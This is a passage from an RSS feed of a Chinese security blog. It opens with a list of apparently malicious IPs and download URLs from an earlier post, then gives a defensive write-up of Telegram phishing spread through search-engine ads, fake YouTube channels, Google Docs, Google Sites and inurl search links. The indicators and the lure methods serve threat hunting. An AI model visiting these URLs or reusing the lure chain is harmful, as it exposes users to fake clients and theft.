leaf=""><br/></span><span leaf="">107.148.51.200:443</span><span leaf=""><br/></span><span leaf="">www.61xdm.com</span><span leaf=""><br/></span><span leaf="">154.19.200.133:8086</span><span leaf=""><br/></span><span leaf=""><a href="http://154.19.200.133:8087/count" target="_blank">http://154.19.200.133:8087/count</a></span><span leaf=""><br/></span><span leaf=""><a href="https://jpbhb.com/s" target="_blank">https://jpbhb.com/s</a></span><span leaf=""><br/></span><span leaf=""><a href="https://jpbhb.com/update" target="_blank">https://jpbhb.com/update</a></span><span leaf=""><br/></span><span leaf=""><a href="https://microsoftstore.oss-cn-beijing.aliyuncs.com/50237?ts=1736924067" target="_blank">https://microsoftstore.oss-cn-beijing.aliyuncs.com/50237?ts=1736924067</a></span><span leaf=""><br/></span><span leaf=""><a href="https://azurex-resource.oss-cn-beijing.aliyuncs.com/47" target="_blank">https://azurex-resource.oss-cn-beijing.aliyuncs.com/47</a></span><span leaf=""><br/></span><span leaf=""><a href="http://47.242.214.157/8.217niuniu" target="_blank">http://47.242.214.157/8.217niuniu</a></span><span leaf=""><br/></span></code></pre><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247485072">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=bb347b8e&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU1NDYxMTE5OA%3D%3D%26mid%3D2247485072%26idx%3D1%26sn%3D3f04adc75eb3853e22365de048190c90%26chksm%3Dfbe1be01cc963717beb6acca30179fb540c05f45a7b379a29fdc8c4ab049b8db1a97adb5c03a%26scene%3D58%26subscene%3D0%23rd">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 23 Jan 2025 07:00:00 +0800</pubDate>
    </item>
    <item>
      <title>基于搜索引擎的telegram钓鱼攻击手法总结</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU1NDYxMTE5OA==&amp;mid=2247484927&amp;idx=1&amp;sn=564fd831cd7856768b7b3100db5b8f88</link>
      <description>目前该攻击类型的主要受害者是tg中文用户，固然tg中的坏人含量相当高，但是对于像金融、贸易、区块链等这些带有跨境业务性质的甲方安全来说，个人认为这是一个不容忽视的风险点。</description>
      <content:encoded><![CDATA[<p>
原创 <span>流水账小明</span> <span>2023-03-17 08:58</span> <span style="display: inline-block;">北京</span>
</p>

<p>目前该攻击类型的主要受害者是tg中文用户，固然tg中的坏人含量相当高，但是对于像金融、贸易、区块链等这些带有跨境业务性质的甲方安全来说，个人认为这是一个不容忽视的风险点。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=e1d530f4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzwWGLiblQo7nlYrcNEL39s0ibwicqemDDfpkwlvlKNeB7yhWjdEiab5Gotw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section data-tool="mdnice编辑器" data-website="https://www.mdnice.com" style="font-size: 16px;color: black;padding: 0px 10px;line-height: 1.6;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">目前该攻击类型的主要受害者是tg中文用户，固然tg中的坏人含量相当高，但是对于像金融、贸易、区块链等这些带有跨境业务性质的甲方安全来说，个人认为这是一个不容忽视的风险点。今天能替换你员工剪贴板，明天就能给你域控下发个 lock.exe 天下大乱。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">换了个方向写流水账，欢迎拍砖。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;"><br/><mpchecktext><br/></mpchecktext></p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;"><span style="display: none;"></span>TL;DR</h2><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="2.1305555555555555" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=bfe15bd0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzakjHlRH2XWqYEtwYkHXib4icckaoAlU61CoVaJJ1mmo35YxfmiaC7Gsgg%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">搜索引擎tg钓鱼手法简要思维导图</figcaption></figure><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;"><span style="display: none;"></span>搜索引擎分类</h2><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>Google<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">目前Google是该攻击类型的主流平台，因为telegram的使用需要XFW以外的网络，也就意味着具备该网络条件的用户一般也具备浏览谷歌的条件。截至目前为止的相当长一段时间内，直接在Google搜索 “telegram” 相关的关键字，返回的搜索结果中的前1-4条一般都会带有 “AD” 或 “赞助商” 这种标识，这些广告结果当中绝大多数都是有所图谋的恶意攻击者故意投放的 “有毒” 广告。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.7444444444444445" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=9692c308&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzhQymt0dbcs9yqoiciajU5buJ0dwnVtyYfFL9GjQ4vaC9fQtP1YkOajJw%2F640%3Fwx_fmt%3Dpng"/></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>Bing<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">Bing搜索引擎也具有付费广告服务，但是使用bing搜索引擎直接搜索 “telegram”、“纸飞机” 等关键字的话，得到的页面是被过滤和筛选后的，猜测是因为政策原因导致搜索结果均是新闻网页。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.4648148148148148" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=66d522df&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzV1goVXNXdjjEj2bibgsj73KGcPQEFUpMKWiapcmOtl5Qbgb0jaUXv4Pw%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">但是该屏蔽政策似乎没有兼顾所有的关键字，使用关键字 <strong style="font-weight: bold;color: black;">“电报”、“电报中文版”</strong> 等关键字仍然可以得到真实的搜索结果，其中包含广告结果以及使用SEO等手段将排名做的很靠前的假冒官网。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.7101851851851851" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=376fac91&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTztsnic4CEGnpd8xwBEPHjKMhoeKdwWFqF5FickiaEIAcvZ9XtukaibhevSA%2F640%3Fwx_fmt%3Dpng"/></p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;"><span style="display: none;"></span>广告投放筛选条件</h2><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">详细分类的话，广告投放大致分为地理位置、语言、意向群体、关键字这几类。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.3175925925925926" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=b284876f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzr5vrBLfRRLZZlSq4HRdsMDO6VpJjr3dvAxyQVfAfpicTY8WfQvOQBhw%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">但是站在自动化搜寻并封禁的角度，我们的方向可以有：语言、IP归属、地理位置、关键字、时段、搜索次数、客户端UA等，尽量满足这些条件去主动迎合恶意攻击者的投放群体画像，以此来达到最佳的封禁效果。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">下面仅举例几个对搜索结果影响较大的关键要素，不一一赘述。</p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>语言<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">简体中文搜索结果</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5416666666666666" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=9be943dc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzwZYicO1N54EuibIceEOyrBrsBVgVoFMXu5Ijwx64PmngWcfM8sbX37Bw%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">繁体中文</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.48333333333333334" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=820166fe&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzWphWS5vrCbTuASTS94iahJxOibNdibIhWc6d8vG1hcmafQfHaNHWV4VZA%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">英文搜索结果</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.43148148148148147" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=1c765c34&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTz6yicNKicA6RyhF6MMLo0IuIJ9ZIaaQ1TxqqiaOzficia9V0ldF3ibH8XlZzg%2F640%3Fwx_fmt%3Dpng"/></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>关键字<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">以telegram中文版为关键字</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.4638888888888889" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=f51191b1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzTowQ21xKYMVfmHhPNib13PcVqh8dp41RwRR5cSgEbKkZk11ylf2HWUg%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">以纸飞机中文版为关键字</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.44074074074074077" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=9f38de3b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzxic1L0jrlibhPq0kQ5TwLfRQ6jaUGCwqajicaB7krsE75gjeGNumicCticA%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">以电报中文版为关键字</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.3648148148148148" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=42e06d75&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTz1dm2DEvayicsQ9ibulPxzTB3pSTz1Jj6CibfwWFr3McLJnBEGp7GfX1zA%2F640%3Fwx_fmt%3Dpng"/></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>客户端<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">直接展示移动端的搜索结果，根据部分搜索结果的网站标题可以看出，其目标群体为安卓用户，这些搜索结果使用PC桌面端的user-agent是无法触达的。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.42962962962962964" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=7b9966d9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzOU1CuOBcH2grz7b0hZkF9ucMb7UCqrloicLY3S9QhcJ8SIBmIHQzthw%2F640%3Fwx_fmt%3Dpng"/></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>位置<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">Google的广告投放按照位置来区分可以简单的分为顶部和底部两种，顶部的广告展示位于真正的搜索结果之上比较引人注目，转化率可能会相对较好，但是容易被人忽略的底部广告位也存在telegram钓鱼攻击广告投放的情况。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5583333333333333" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=16e0d5b0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzNM5Cyyia8u5GOPBGTpmsYGoNu1vZliaqeSflPBZ3G0VqQhVMiaLNMzYQA%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><br/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5527777777777778" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=b4ed32b0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzhVIkxnvd9TbgSBiaWtTicGfz9OwOEjvNpjBvy4fLO47gXDsfdiaHsJ5PQ%2F640%3Fwx_fmt%3Dpng"/></p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;"><span style="display: none;"></span>中转页面</h2><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">中转页面即为搜索引擎给出的搜索结果，攻击者一般会围绕 ”白利用“ 的思想采用各种手段保证中转页面的合法性，下面介绍的是结合日常安全运营工作当中发现的主流中转手法。</p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>YouTube频道页面<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">YouTube是最传统、在搜索结果中最常见的中转方式，从最初出现到现在可能达到数年之久。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.12882787750791974" data-s="300,640" style="" data-type="png" data-w="947" src="https://wechat2rss.xlab.app/img-proxy/?k=7ad415a6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzL16Eu4H6zLj9cF1EtFBOg7jZSaGY9w872xRjx4JqjMZWchCpuVJazg%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">目前为止基本只有一种形式，即创建一个名称为 “telegram中文版” 相关的YouTube频道，频道的背景、介绍话术、头像、各种图标ico等均设置为telegram相关，给搜索者一种telegram官方制作的推广页面的感觉。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">然后频道详情页面下方的超链接被设置为恶意的链接，以此引导用户浏览假冒的telegram官网等页面，直至用户下载安装假冒的telegram客户端。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5222222222222223" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=e5ae7eea&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzm4OgNE1iaYLkQ2OvI3FDIib9AWIibp6IvNRZIcZWzsh4X6mjy2Y781QXw%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><br/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.45925925925925926" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=3812b38d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzjj4x81RPVYOVIJAyIzRpuBPwEwb3LJj4riaKicK2faZCW8zvgYYGpiazA%2F640%3Fwx_fmt%3Dpng"/></p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 18px;"><span style="display: none;"></span>频道链接指向问题<span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">在以往的应急过程中，大多数情况下频道页面下面的6个超链接对应的跳转链接是一致的。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">需要注意的是，虽然不是很常见，但是有时会遇到六个超链接对应的跳转链接不一致的情况，所以手动排查和自动化搜集时应该注意这个问题避免遗漏。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.4212962962962963" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=94312d48&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzkHk0YUvxaWGCwBDfnQvPMVCwmF3Oj1rB6zA4PYUmm8c7aOvwiaPuHjg%2F640%3Fwx_fmt%3Dpng"/></p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 18px;"><span style="display: none;"></span>YouTube搜索频道<span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">YouTube支持根据关键字搜索频道，不过搜索结果当中作品和频道是混在一起的。根据这个思路可以直接通过搜索关键字的形式找到这些假冒的频道页，再提取详情介绍里面的超链接，批量封禁。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">并且根据实际观察到的情况来看，大多数实际触达到用户的频道基本都是提前建立的，提前时间在几天到一两个月不等。个人猜测攻击者准备资源、通过审核可能也需要一定的时间，所以这种方式封禁域名有一定的预判作用，时效性的效果可能会好一些。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5212962962962963" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=4a7a440c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzvPvict1rEYFqicy5f5piaRpOBwssmMUBCqYic0b6mOpksAdbAflVsdWRhA%2F640%3Fwx_fmt%3Dpng"/></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>Google文档<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">Google文档即为谷歌官方提供的在线文档服务，使用Google文档作为中转页面的手法出现时间相对较短，不过也是目前出镜率相对较高的一种中转方式。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">搜索相关关键字时，可以看到推广域名是 docs.google.com。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.28525641025641024" data-s="300,640" style="" data-type="png" data-w="936" src="https://wechat2rss.xlab.app/img-proxy/?k=95055d1a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTz6uY49jkuRcAVbQ6RbVJnJgDVN7S7yzF4j8gNKqSGUZeGf3sQEQS0zA%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">链接对应的实际就是攻击者设计好的谷歌在线文档，文档假冒telegram推广相关主题，下载文本的超链接同样被设置为恶意地址，诱导用户继续访问假冒telegram官网或直接返回恶意telegram客户端的下载地址。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.7509259259259259" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=639240f1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzex0Ugk1NG3Tr0FIK7vSs7G4WiaWrxBCMN45pN9G3pL22rp2lcBAb3Zw%2F640%3Fwx_fmt%3Dpng"/></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>Google Site<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">该攻击方式的思想与Google文档相似，均是利用Google提供的第三方服务作为中转恶意地址的 “白名单” 基础设施。Google Site本身为Google的一款以Wiki为基础的在线网站制作系统，为Google Apps的一部分，一般被用来搭建基础的展示网页。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">搜索相关关键字时，有时可以得到域名为 ”sites.google.com“ 的搜索结果。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.4925925925925926" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=6ea5136e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzWLL4Lpf0pYJibd1aAy17kdEVNAMDkjywVwpFjYgTMMBRfZJWzDDSMKQ%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">点击链接后，可以发现攻击者使用Google sites的服务创建了一个仿冒telegram官网的web站点，最醒目处的两个按钮就是恶意客户端的下载地址。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5027777777777778" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=cf98779d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzKVgTjpjccUmPzX3TibQgCgU9QrUF6FOMAyVMfUszJ6REw8dcvYRm6BQ%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">上图展示的是为Windows PC准备的钓鱼网站，针对移动端的钓鱼攻击同样也有使用Google sites作为中转页面的案例。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5287037037037037" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=43d1cd49&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzVG4AWkKCSxUMmIrxJ49C2u4QDga0tuZepDQfqYXGWubjxa7YcGbytQ%2F640%3Fwx_fmt%3Dpng"/></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>搜索引擎语法<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">接触过信息安全的人可能都对Google hacking不陌生，因为早几年网上的教程基本都是从 ”信息搜集“ 开始讲，信息搜集教学当中经常就会带有Google hacking语法教学这种环节，其中比较常见的大概是 inurl、filetype、site 这些语法，其中site、inurl 语法都有筛选指定的网站搜索结果的功能，并且比较通用的语法基本对大型的搜索引擎都是适用的。</p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 18px;"><span style="display: none;"></span>Google 搜索语法<span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">当发现搜索结果中的推广地址为 www.google.com 的时候，对应的就是攻击者利用谷歌搜索语法的结果。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6518518518518519" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=3c8958b1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzLYYPMmQzic5ibTJleLoONABkcfibpmQk9ZSOyNJeaYIehTvoiar4DUES3g%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">点击推广的结果后，可见链接地址对应的是针对某个特定的假冒telegram官网域名的搜索引擎语法搜索结果，攻击者利用inurl语法使telegram只展示位于该假冒域名下的url搜索结果，受害用户不管点击哪个搜索结果，最终都将在攻击者的假冒官网上下载假冒的客户端。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5444444444444444" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=3d7d78b2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzUliaAZKn3INiaRoz2ayPicPVsb4gAN6sDeiaWYVqzglaibWyvCj6HjRCJVQ%2F640%3Fwx_fmt%3Dpng"/></p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 